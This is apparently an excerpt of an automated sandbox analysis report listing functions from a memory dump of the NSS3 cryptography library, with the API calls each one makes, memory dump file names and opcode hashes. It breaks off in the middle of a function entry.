Function 6C74CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C74C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C74DAE2,?), ref: 6C74C6C2

PR_Now.NSS3 ref: 6C74CD35

Part of subcall function 6C7A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DC6
Part of subcall function 6C7A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DD1
Part of subcall function 6C7A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7A9DED

Part of subcall function 6C736C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6E1C6F,00000000,00000004,?,?), ref: 6C736C3F

PR_GetCurrentThread.NSS3 ref: 6C74CD54

Part of subcall function 6C7A9BF0: TlsGetValue.KERNEL32(?,?,?,6C7F0A75), ref: 6C7A9C07

Part of subcall function 6C737260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6E1CCC,00000000,00000000,?,?), ref: 6C73729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C74CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C74CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C74CE2C

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C74CE40

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

Part of subcall function 6C74CEE0: PORT_ArenaMark_Util.NSS3(?,6C74CD93,?), ref: 6C74CEEE
Part of subcall function 6C74CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C74CD93,?), ref: 6C74CEFC
Part of subcall function 6C74CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C74CD93,?), ref: 6C74CF0B
Part of subcall function 6C74CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C74CD93,?), ref: 6C74CF1D

Part of subcall function 6C74CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C74CD93,?), ref: 6C74CF47
Part of subcall function 6C74CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C74CD93,?), ref: 6C74CF67
Part of subcall function 6C74CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C74CD93,?,?,?,?,?,?,?,?,?,?,?,6C74CD93,?), ref: 6C74CF78

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 924b150ba19a621533dd0c6c777fdddbed4d9602a6514442af5cca0bb8c3fbf1
Instruction ID: 8a1ca3f74fdcec6d62024e18b686cf79cb6ae435b7bd930326ccbe43ea001080
Opcode Fuzzy Hash: 924b150ba19a621533dd0c6c777fdddbed4d9602a6514442af5cca0bb8c3fbf1
Instruction Fuzzy Hash: 4151D376A001209BE710EF69DE48FAA73F8AF48349F258534D80897B41FB31ED09CB91

Function 6C75FFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6C75FFE5

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_EnterMonitor.NSS3(?), ref: 6C760004
PR_EnterMonitor.NSS3(?), ref: 6C76001B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 855a866123fbec5d717133f941337558038b0db25f1d474a6b0f8bc0e5e9bba7
Instruction ID: 24d23995a86ab2bdca65968898bd1c613a941dbb21d13c4066dad29f59fb37ba
Opcode Fuzzy Hash: 855a866123fbec5d717133f941337558038b0db25f1d474a6b0f8bc0e5e9bba7
Instruction Fuzzy Hash: 56418B742446808BE7244A2BDE597AF73A1DB40388F10053DEC47CAE91E3B5A95AC74A

Function 6C71EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C71EF38

Part of subcall function 6C709520: PK11_IsLoggedIn.NSS3(00000000,?,6C73379E,?,00000001,?), ref: 6C709542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C71EF53

Part of subcall function 6C724C20: TlsGetValue.KERNEL32 ref: 6C724C4C
Part of subcall function 6C724C20: EnterCriticalSection.KERNEL32(?), ref: 6C724C60
Part of subcall function 6C724C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C724CA1
Part of subcall function 6C724C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C724CBE
Part of subcall function 6C724C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C724CD2
Part of subcall function 6C724C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C724D3A

PR_GetCurrentThread.NSS3 ref: 6C71EF9E

Part of subcall function 6C7A9BF0: TlsGetValue.KERNEL32(?,?,?,6C7F0A75), ref: 6C7A9C07

free.MOZGLUE(00000000), ref: 6C71EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C71F016
free.MOZGLUE(00000000), ref: 6C71F022

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: df12010ffa99c94c7565524797ae6beaba107c76d614b581e2e92eb8e793dbc1
Instruction ID: 20dfbd4fb1fc01ac48cab9404f15e59b9de4dac8605f62093ff609e1d7a2ba57
Opcode Fuzzy Hash: df12010ffa99c94c7565524797ae6beaba107c76d614b581e2e92eb8e793dbc1
Instruction Fuzzy Hash: D24192B1E00209AFDF018FA9DD49BEE7BB9AF48358F044035F918A6751E772C915CBA1

Function 6C70CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C70CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C70D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C70D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C70D025
PR_NewLock.NSS3 ref: 6C70D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C70D074

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: b9e9c216b8736e6114d8b03d56d10f4548d2b913a0b78305a5382b83de4a0677
Instruction ID: f29e95204927bec07c35a9f5c84ef5caee5683f94a788ce3b4019ead8ddd8bba
Opcode Fuzzy Hash: b9e9c216b8736e6114d8b03d56d10f4548d2b913a0b78305a5382b83de4a0677
Instruction Fuzzy Hash: 7D418FF1B013118BEB10DF29CA8879A7BE4AF18319F104179DC1D8B746D774D485CBA6

Function 6C753FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C753FF2

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaMark_Util.NSS3(?), ref: 6C754001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C75400F

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C754054

Part of subcall function 6C6EBB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C6EBC24
Part of subcall function 6C6EBB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6EBC39
Part of subcall function 6C6EBB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C6EBC58
Part of subcall function 6C6EBB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C6EBCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C754070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C7540CD

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 02a05c8cfdae8bee741e74aab53dcfc010755ea9f2d16ec54606377d06d24241
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 85310771E0034597EB009F649E45BBA3364AF9061CF544278ED0C9B742FF21E978C291

Function 6C6F2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C6E2D1A), ref: 6C6F2E7E

Part of subcall function 6C7407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6E8298,?,?,?,6C6DFCE5,?), ref: 6C7407BF
Part of subcall function 6C7407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7407E6
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C74081B
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C740825

PR_Now.NSS3 ref: 6C6F2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C6F2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C6E2D1A), ref: 6C6F2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C6E2D1A), ref: 6C6F2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C6F2F81

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 84ae8b779df5743c810889ce1f7277d35bf6976e7d33aaa76742490246ffb827
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: FC31D27156318087F710C669C84DBAA7367EB81318F64456AD43997AD0EB31988BCE1A

Function 6C6E0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C6E0A2C), ref: 6C6E0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C6E0A2C), ref: 6C6E0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C6E0A2C), ref: 6C6E0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C6E0A2C), ref: 6C6E0E90
free.MOZGLUE(00000000), ref: 6C6E0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C6E0A2C), ref: 6C6E0ED9

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: ae85e08e5db510b0d3e013836df98b8280ed019bc76f37562ab67dc551841731
Instruction ID: 19d735ebde495331e067cb75eb12e7f7835d142774c80361fbb43a0513668a30
Opcode Fuzzy Hash: ae85e08e5db510b0d3e013836df98b8280ed019bc76f37562ab67dc551841731
Instruction Fuzzy Hash: 86216E72E0A28557EB1045759C85BAB72AFDBC9748F094037D81CA3A12FF60C81796A6

Function 6C6EAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6EAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C6EAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6EAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C6EAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C809500), ref: 6C6EAF23

Part of subcall function 6C73F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C73F0C8
Part of subcall function 6C73F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C73F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6EAF37

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 00a73492611466d5386b0666d214dbfa3b7c6f9f5439b6d55202f32a79674c89
Instruction ID: 0453c646636ca90e5bb2cd3499b3f757ad3631c4e54b65603d87af6579bdba50
Opcode Fuzzy Hash: 00a73492611466d5386b0666d214dbfa3b7c6f9f5439b6d55202f32a79674c89
Instruction Fuzzy Hash: 5E215CB190A2009BE7104F189D05B9A7FF4AF8832CF144716FD589B7D2E731D50987AB

Function 6C76EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76EE85
realloc.MOZGLUE(407E7CC6,?), ref: 6C76EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C76EEC5

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

htonl.WSOCK32(?), ref: 6C76EEE3
htonl.WSOCK32(00000000,?), ref: 6C76EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C76EF01

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: f5e1491d38891aed0e6b80f786b5c98546bfeb4abd233238775b1515bd0ed5e5
Instruction ID: fdc7834e694160a4d583bd72ae0b3ddee8bbc2a8fa26e45e6e75fa6b229e2eac
Opcode Fuzzy Hash: f5e1491d38891aed0e6b80f786b5c98546bfeb4abd233238775b1515bd0ed5e5
Instruction Fuzzy Hash: 0921D371A002189FDB109F29DE8879A77A8EF45358F148139ED199BB41E330EC14CBF2

Function 6C71EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C71EE49

Part of subcall function 6C73FAB0: free.MOZGLUE(?,-00000001,?,?,6C6DF673,00000000,00000000), ref: 6C73FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C71EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C71EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C71EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C71EEB3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: e632d8a7c09875e9be4411e9a5e73cd125bcdc28871ce73d44817b78511314c6
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 2721F6B6A042146BEB018A14DD89EABB7ACAF05718F080164FD089BB12E671DC1887F1

Function 6C6E7F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6E7F68

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C6E7F7B

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6E7FA7

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C80919C,?), ref: 6C6E7FBB

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6E7FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C80915C,00000014), ref: 6C6E7FFE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: 844d718b128ed129180fba6a74b207b878cd518689e566718ffc7600fd40b965
Instruction ID: 7bd82cce88e53177358903fb15ee4eaaced62b73c7e1844ca4931ee06d399a64
Opcode Fuzzy Hash: 844d718b128ed129180fba6a74b207b878cd518689e566718ffc7600fd40b965
Instruction Fuzzy Hash: DE113A71E0520457F7209A259E48BBB76E8DF4865CF000A2EFD59C6B42F720A548C6FA

Function 6C6EBE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6C76DC29,?), ref: 6C6EBE64

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
